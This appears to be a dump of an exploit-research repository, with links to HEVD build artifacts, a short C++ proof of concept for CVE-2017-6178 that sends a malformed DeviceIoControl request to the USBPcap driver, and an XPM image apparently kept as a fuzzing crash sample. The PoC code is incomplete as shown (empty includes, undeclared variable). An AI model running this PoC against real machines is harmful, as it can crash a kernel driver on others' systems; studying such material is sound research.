https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/vc100.pdb
--------------------------------------------------------------------------------
/_cve_2017_6178_poc/_CVE_2017_6178_PoC.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main(int argc, char *argv[])
5 | {
6 | HANDLE hDevice;
7 | DWORD dwRetBytes = 0;
8 | hDevice = CreateFile("\\\\.\\USBPcap1", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
9 |
10 | if (hDevice == INVALID_HANDLE_VALUE)
11 | {
12 | printf("[-] CreateFile failed (%.08x)\n", GetLastError());
13 | return -1;
14 | }
15 | bResult = DeviceIoControl(hDevice, 0x00090000,(LPVOID)0x1, (DWORD)0, NULL, 0, &dwRetBytes, NULL);
16 | if (!bResult)
17 | {
18 | printf("[-] DeviceIOControl failed (%.08x)\n",GetLastError());
19 | return 0;
20 | }
21 | printf("[+] if show this info ,PoC is failed:(\n\n");
22 | return 0;
23 | }
--------------------------------------------------------------------------------
/memory-leak_output_art_ReadOnePNGImage_output.picon:
--------------------------------------------------------------------------------
1 | /* XPM */
2 | static char *memory-leak_output_art_ReadOnePNGImage_output[] = {
3 | /* columns rows colors chars-per-pixel */
4 | "48 48 31 1",
5 | " c black",
6 | ". c DarkSlateGray",
7 | "X c #7E7E7E",
8 | "o c firebrick",
9 | "O c red",
10 | "+ c sienna",
11 | "@ c tomato",
12 | "# c green",
13 | "$ c LimeGreen",
14 | "% c SeaGreen",
15 | "& c orange",
16 | "* c peru",
17 | "= c gold",
18 | "- c yellow",
19 | "; c navy",
20 | ": c blue",
21 | "> c #800080",
22 | ", c magenta",
23 | "< c SlateGray",
24 | "1 c DodgerBlue",
25 | "2 c cyan",
26 | "3 c tan",
27 | "4 c PaleGreen",
28 | "5 c wheat",
29 | "6 c violet",
30 | "7 c SkyBlue",
31 | "8 c gainsboro",
32 | "9 c LemonChiffon",
33 | "0 c lavender",
34 | "q c white",
35 | "w c grey75",
36 | /* pixels */
37 | ";1<;1:<;1;<;1;;1;.:<<;1:<;<:.;1;:<;<:<:<:;<::<;<",
38 | ":.:.;<;1;<:<:<<:<:1;:<;<;1:<:1:.:<:<:<:.:.<;1;<1;.:<;1;qqq;<::<;<;<<:1;;1:<",
40 | ";1;<1<:.;1;<:<1;<;<:;<:<:<0qqqq1;1.;<:1;;.:<<:.;",
41 | ";<;1;.1;.1;;<;;1:<>1;<1;qqqqq:<;;<:1<;<:1;1;<:1.",
42 | "1:<;<::<:<<:::<;.:1;.:;1;<21:<;;<::<;<",
50 | "11711.;1<;1;711;;<<;2;.1<:<.71;11;.:2;<;<:;<<;1;",
51 | "2711;;<;:1;<2:;<;<:;71;<;1<:2;<:qqqqq;;11;1;<::<",
52 | "1117<::<<;<:2<<:1:.12;1:<;;171;1;<:<;1.;",
53 | "17711;<:;1:<;<;1><:.2<:<;1;<21;:<;1;71;1;;<:1;<1",
54 | "1121;1;<<;<;1:<;1;.;q;.:<;1;2>;<:<;12;<:<:;<7;:.",
55 | "2117<:<;:<;1;<:<:<100>1;:1;<2;1;1;<;72;<1;1;;1<;",
56 | "1171;<:;1;<:.:<;.:<;21;<<;<:2<:<;<:12<1;;<:<2<:<",
57 | "27111;2<;<:.;<:1:<.:2<1;<;:<<;1;2<;;<;:<2<1;:<;:",
58 | "1127;<<:1;<::<<;1;:<2;>1:1.;:<:<2<:<:1.;2:;<<;1.",
59 | "2117<:<2:<;11;<2;<;qq:.;;<;1;1;<7:;1;<;17;1::.1:",
60 | "1711;1;:.;1>;<:;<:1;2<:<<:<:<;<:2.1;<:<;2<;<<:;<",
61 | "1171<.1;2<;;1;.12#$---4-7;1;<;1;2<::%::1;<21;.:.",
62 | "21q111<;:<:<:<:<<:<1;21117711q@@O@O-4---4$=-44-4",
63 | " ",
64 | " ",
65 | " ",
66 | " ",
67 | " ",
68 | " ",
69 | " ",
70 | " ",
71 | " ",
72 | " ",
73 | " ",
74 | " ",
75 | " ",
76 | " ",
77 | " ",
78 | " ",
79 | " ",
80 | " ",
81 | " ",
82 | " ",
83 | " ",
84 | " "
85 | };
86 |
--------------------------------------------------------------------------------